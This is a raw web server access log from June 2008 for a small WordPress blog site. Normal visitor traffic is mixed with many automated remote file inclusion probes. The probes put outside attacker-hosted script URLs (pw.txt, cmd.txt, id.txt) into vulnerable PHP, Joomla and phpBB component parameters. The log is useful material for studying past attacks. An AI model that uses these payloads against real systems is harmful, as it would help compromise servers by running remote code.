200.250.121.2 - - [11/Jun/2008:12:58:56 -0700] "GET /home.php?pag=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.2.100.138 - - [11/Jun/2008:12:58:57 -0700] "GET /logs/access.log/index2.php?x=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [11/Jun/2008:12:58:58 -0700] "GET /index2.php?x=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.250.121.2 - - [11/Jun/2008:12:59:00 -0700] "GET /logs/home.php?pag=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.2.100.138 - - [11/Jun/2008:12:59:04 -0700] "GET /logs/index2.php?x=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
206.221.179.200 - - [11/Jun/2008:12:59:32 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://Sin1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.221.179.200 - - [11/Jun/2008:12:59:32 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://Sin1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:12:59:37 -0700] "GET /logs/access_080221.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:12:59:38 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:12:59:38 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.174.65.190 - - [11/Jun/2008:12:59:47 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.organicsalive.org/webyep-system/program/images/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.174.65.190 - - [11/Jun/2008:12:59:50 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.organicsalive.org/webyep-system/program/images/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.174.65.190 - - [11/Jun/2008:12:59:53 -0700] "GET /logs/access_071230.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.organicsalive.org/webyep-system/program/images/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:13:00:11 -0700] "GET /logs/access_080308.log/index.php?redir=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.2.100.138 - - [11/Jun/2008:13:00:12 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:13:00:13 -0700] "GET /index.php?redir=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 200 18385 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:13:00:13 -0700] "GET /logs/index.php?redir=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:13:00:14 -0700] "GET /logs/access_080308.log/index.php?redir=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.89.25.154 - - [11/Jun/2008:13:00:15 -0700] "GET /logs/access_080308.log/index.php?redir=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
81.174.65.190 - - [11/Jun/2008:13:00:16 -0700] "GET /logs/access_080103.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.organicsalive.org/webyep-system/program/images/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.2.100.138 - - [11/Jun/2008:13:00:16 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:13:00:16 -0700] "GET /index.php?redir=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 200 18385 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:13:00:16 -0700] "GET /logs/index.php?redir=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.89.25.154 - - [11/Jun/2008:13:00:17 -0700] "GET /index.php?redir=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 200 18385 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.25.154 - - [11/Jun/2008:13:00:17 -0700] "GET /logs/index.php?redir=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
62.2.100.138 - - [11/Jun/2008:13:00:18 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:13:00:22 -0700] "GET /logs/access_080215.log/index.php?redir=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:13:00:31 -0700] "GET /logs/access_080215.log/index.php?redir=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.89.25.154 - - [11/Jun/2008:13:00:37 -0700] "GET /logs/access_080215.log/index.php?redir=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
211.239.161.10 - - [11/Jun/2008:13:00:44 -0700] "GET /logs/access_080228.log/joomla/index.php?option=com_restaurante&task=http://1800autoauction.com/logs/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [11/Jun/2008:13:00:44 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://1800autoauction.com/logs/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [11/Jun/2008:13:00:45 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://1800autoauction.com/logs/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.221.143.111 - - [11/Jun/2008:13:01:16 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.214.109.12 - - [11/Jun/2008:13:01:16 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.team-nds.de/includes/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.221.143.111 - - [11/Jun/2008:13:01:16 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.214.109.12 - - [11/Jun/2008:13:01:16 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.team-nds.de/includes/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:13:01:20 -0700] "GET /logs/access.log/home.php?pagina=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:13:01:20 -0700] "GET /home.php?pagina=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:13:01:20 -0700] "GET /logs/home.php?pagina=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.89.25.154 - - [11/Jun/2008:13:01:24 -0700] "GET /logs/access.log/home.php?pagina=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.25.154 - - [11/Jun/2008:13:01:24 -0700] "GET /home.php?pagina=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.25.154 - - [11/Jun/2008:13:01:24 -0700] "GET /logs/home.php?pagina=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
63.206.47.131 - - [11/Jun/2008:13:01:29 -0700] "GET / HTTP/1.1" 200 18257 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.dmulk.com"
63.206.47.131 - - [11/Jun/2008:13:01:30 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.1" 200 9232 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
63.206.47.131 - - [11/Jun/2008:13:01:30 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.1" 200 5241 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
63.206.47.131 - - [11/Jun/2008:13:01:30 -0700] "GET /blog/wp-includes/js/jquery/jquery.js?ver=1.2.3 HTTP/1.1" 200 29867 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
63.206.47.131 - - [11/Jun/2008:13:01:30 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.1" 200 4019 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
63.206.47.131 - - [11/Jun/2008:13:01:30 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox-pack.js?ver=3.1.1 HTTP/1.1" 200 8888 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
63.206.47.131 - - [11/Jun/2008:13:01:30 -0700] "GET /blog/wp-content/plugins/nggallery/admin/js/swfobject.js?ver=1.5 HTTP/1.1" 200 6722 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
63.206.47.131 - - [11/Jun/2008:13:01:30 -0700] "GET /blog/wp-content/themes/default/images/kubrickbgcolor.jpg HTTP/1.1" 200 556 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
63.206.47.131 - - [11/Jun/2008:13:01:30 -0700] "GET /blog/wp-content/themes/default/images/kubrickbgwide.jpg HTTP/1.1" 200 1014 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
63.206.47.131 - - [11/Jun/2008:13:01:31 -0700] "GET /blog/wp-content/plugins/nggallery/imagerotator.swf HTTP/1.1" 200 42010 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
63.206.47.131 - - [11/Jun/2008:13:01:31 -0700] "GET /blog/wp-content/plugins/nggallery/imagerotator.swf HTTP/1.1" 200 42010 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
63.206.47.131 - - [11/Jun/2008:13:01:31 -0700] "GET /blog/wp-content/themes/default/images/kubrickheader.jpg HTTP/1.1" 200 7868 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
63.206.47.131 - - [11/Jun/2008:13:01:32 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=3&881 HTTP/1.1" 200 6289 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
63.206.47.131 - - [11/Jun/2008:13:01:33 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=1&274 HTTP/1.1" 200 19014 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
63.206.47.131 - - [11/Jun/2008:13:01:33 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0165.jpg HTTP/1.1" 200 364141 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
63.206.47.131 - - [11/Jun/2008:13:01:33 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0009.jpg HTTP/1.1" 200 308950 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
64.118.88.84 - - [11/Jun/2008:13:01:34 -0700] "GET /logs/access_080118.log/modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://www.reskate.net/chicas/albums/album44/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:13:01:34 -0700] "GET /modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://www.reskate.net/chicas/albums/album44/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:13:01:34 -0700] "GET /logs/modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://www.reskate.net/chicas/albums/album44/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.206.47.131 - - [11/Jun/2008:13:01:35 -0700] "GET /blog/wp-content/uploads/2008/04/img_1120.JPG HTTP/1.1" 200 3072529 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
63.206.47.131 - - [11/Jun/2008:13:01:37 -0700] "GET /blog/wp-content/uploads/2008/04/img_1123.JPG HTTP/1.1" 200 4659669 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
201.24.2.220 - - [11/Jun/2008:13:01:39 -0700] "GET /logs/access_080131.log/home.php?pag=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.206.47.131 - - [11/Jun/2008:13:01:40 -0700] "GET /blog/wp-content/uploads/2008/04/img_1133.JPG HTTP/1.1" 200 5288628 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
201.24.2.220 - - [11/Jun/2008:13:01:41 -0700] "GET /home.php?pag=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.206.47.131 - - [11/Jun/2008:13:01:42 -0700] "GET /blog/wp-content/uploads/2008/04/img_1129.JPG HTTP/1.1" 200 3839261 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
63.206.47.131 - - [11/Jun/2008:13:01:42 -0700] "GET /blog/wp-content/uploads/2008/04/img_1131.thumbnail.JPG HTTP/1.1" 200 3726 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
201.24.2.220 - - [11/Jun/2008:13:01:43 -0700] "GET /logs/home.php?pag=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.206.47.131 - - [11/Jun/2008:13:01:44 -0700] "GET /blog/wp-content/uploads/2008/04/img_1130.JPG HTTP/1.1" 200 3013085 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
63.206.47.131 - - [11/Jun/2008:13:01:45 -0700] "GET /blog/wp-content/uploads/2008/04/img_1124.JPG HTTP/1.1" 200 3820844 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
63.206.47.131 - - [11/Jun/2008:13:01:45 -0700] "GET /blog/wp-content/uploads/2008/04/img_1132.JPG HTTP/1.1" 200 3221099 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
63.206.47.131 - - [11/Jun/2008:13:01:47 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0160.jpg HTTP/1.1" 200 386726 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
63.206.47.131 - - [11/Jun/2008:13:01:48 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0006.jpg HTTP/1.1" 200 459527 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
63.206.47.131 - - [11/Jun/2008:13:01:48 -0700] "GET /blog/wp-content/uploads/2008/04/img_1135.JPG HTTP/1.1" 200 3097783 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
63.206.47.131 - - [11/Jun/2008:13:01:48 -0700] "GET /blog/wp-content/uploads/2008/04/crestoc07-3.jpg HTTP/1.1" 200 51084 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
63.206.47.131 - - [11/Jun/2008:13:01:50 -0700] "GET /blog/wp-content/themes/default/images/kubrickfooter.jpg HTTP/1.1" 200 2443 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
63.206.47.131 - - [11/Jun/2008:13:01:53 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/loadingAnimationv3.gif HTTP/1.1" 200 5886 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
63.206.47.131 - - [11/Jun/2008:13:01:57 -0700] "GET /blog/wp-content/uploads/2008/04/img_1136.JPG HTTP/1.1" 200 4254533 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
63.206.47.131 - - [11/Jun/2008:13:02:00 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0137_0.jpg HTTP/1.1" 200 385301 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
63.206.47.131 - - [11/Jun/2008:13:02:01 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0130.jpg HTTP/1.1" 200 510650 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
216.127.70.91 - - [11/Jun/2008:13:02:12 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.team-nds.de/includes/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.206.47.131 - - [11/Jun/2008:13:02:12 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0154.jpg HTTP/1.1" 200 344712 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
216.127.70.91 - - [11/Jun/2008:13:02:12 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.team-nds.de/includes/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.206.47.131 - - [11/Jun/2008:13:02:13 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0032.jpg HTTP/1.1" 200 305289 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
63.206.47.131 - - [11/Jun/2008:13:02:25 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0153.jpg HTTP/1.1" 200 343210 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
63.206.47.131 - - [11/Jun/2008:13:02:26 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0074.jpg HTTP/1.1" 200 466874 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
62.2.100.138 - - [11/Jun/2008:13:02:29 -0700] "GET /logs/access_080126.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "dmulk.com"
62.2.100.138 - - [11/Jun/2008:13:02:30 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "dmulk.com"
62.2.100.138 - - [11/Jun/2008:13:02:31 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "dmulk.com"
211.115.213.236 - - [11/Jun/2008:13:02:38 -0700] "GET /logs/access_080118.log/index.php?module=search&q=marks//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.hebronhighband.org/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.185.237.149 - - [11/Jun/2008:13:03:02 -0700] "GET /database.php?mosConfig_absolute_path=http://www.geocities.com/vianarina/test.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
81.174.65.190 - - [11/Jun/2008:13:03:17 -0700] "GET /logs/access_071231.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.organicsalive.org/webyep-system/program/images/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:13:03:21 -0700] "GET /logs/access.log/home.php?pagina=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:13:03:22 -0700] "GET /home.php?pagina=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:13:03:22 -0700] "GET /logs/home.php?pagina=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.222.17.2 - - [11/Jun/2008:13:03:34 -0700] "GET /logs/access_080221.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://holaas.net78.net/cmd.txt????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.222.17.2 - - [11/Jun/2008:13:03:34 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://holaas.net78.net/cmd.txt????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.222.17.2 - - [11/Jun/2008:13:03:34 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://holaas.net78.net/cmd.txt????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
190.54.28.163 - - [11/Jun/2008:13:03:47 -0700] "GET /logs/sub.php?s=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.239.161.10 - - [11/Jun/2008:13:03:47 -0700] "GET /logs/access_080220.log/joomla/index.php?option=com_restaurante&task=http://1800autoauction.com/logs/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.174.65.190 - - [11/Jun/2008:13:03:51 -0700] "GET /logs/access_071228.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.organicsalive.org/webyep-system/program/images/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:13:04:07 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:13:04:07 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:13:04:07 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.215.67.3 - - [11/Jun/2008:13:04:10 -0700] "GET /logs/access_080219.log/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.215.67.3 - - [11/Jun/2008:13:04:11 -0700] "GET /logs/access_080219.log/errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
